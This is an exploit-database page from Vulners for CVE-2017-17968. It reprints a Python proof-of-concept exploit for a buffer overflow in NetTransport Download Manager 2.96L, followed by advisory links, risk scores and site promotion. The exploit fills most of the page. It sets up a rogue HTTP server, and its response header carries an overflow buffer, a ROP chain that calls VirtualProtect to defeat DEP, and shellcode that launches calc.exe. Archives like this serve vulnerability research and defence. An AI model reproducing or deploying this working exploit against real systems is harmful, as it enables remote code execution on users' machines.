Vulners
Lucene search
NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | NetTransport 2.96L - Buffer Overflow (DEP Bypass) Exploit | 29 Dec 201700:00 | – | zdt |
 | CVE-2017-17968 | 29 May 201815:50 | – | circl |
 | NetTransport Download Manager Buffer Overflow Vulnerability | 2 Jan 201800:00 | – | cnvd |
 | CVE-2017-17968 | 29 Dec 201715:00 | – | cve |
 | CVE-2017-17968 | 29 Dec 201715:00 | – | cvelist |
 | NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) | 29 Dec 201700:00 | – | exploitpack |
 | NetTransport Download Manager 2.90.510 Buffer Overflow | 3 Jan 201016:07 | – | metasploit |
 | CVE-2017-17968 | 29 Dec 201715:29 | – | nvd |
 | CVE-2017-17968 | 29 Dec 201715:29 | – | osv |
 | NetTransport Download Manager 2.96L Buffer Overflow | 28 Dec 201700:00 | – | packetstorm |
10
#!/usr/bin/python
# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip
# Exploit Author: Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://xi-soft.com/default.htm
# Category: webapps
# Impact: Code execution
#1. Description
#
#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
#
#2. Proof of Concept
#
#!/usr/bin/pythion
def main():
host = "192.168.205.131"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
#Disabling DEP by VirtualProtect()
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x10001653, # POP EAX # RETN [libssl.dll]
0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00496596, # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x004ea919, # POP EBP # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x4141, # Filler (RETN offset compensation)
0x004608df, # & push esp # ret [NetTransport.exe]
0x0045e75f, # POP EBX # RETN [NetTransport.exe]
0x00000201, # 0x00000201-> ebx
0x00554dbc, # POP ECX # RETN [NetTransport.exe]
0x00000040, # 0x00000040-> edx
0x00499c92, # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
0x0041254c, # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x0054e559, # POP ECX # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x10004b93, # &Writable location [libssl.dll]
0x0050343f, # POP EDI # RETN [NetTransport.exe]
0x00487073, # RETN (ROP NOP) [NetTransport.exe]
0x10001653, # POP EAX # RETN [libssl.dll]
0x90909090, # nop
0x00486f78, # PUSHAD # RETN [NetTransport.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#Tiny calc.exe shellcode
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
MaxSize = 60000
EAX_overwrite= "A"*16739 #Always trigger a crash at EAX
#EIP 004E7828
#evil = "\x28\x78\x4E\x90"
rop = rop_chain
nops = "\x90"*10
pads = "C"*(MaxSize - len(EAX_overwrite + rop + nops + shellcode))
payload = EAX_overwrite + rop + nops + shellcode + pads
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
cl.close()
s.close()
if __name__ == '__main__':
import struct
import socket
main()
#3. Solution:
#
#No solution available at the moment.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Dec 2017 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 39.8
CVSS 210
EPSS0.54586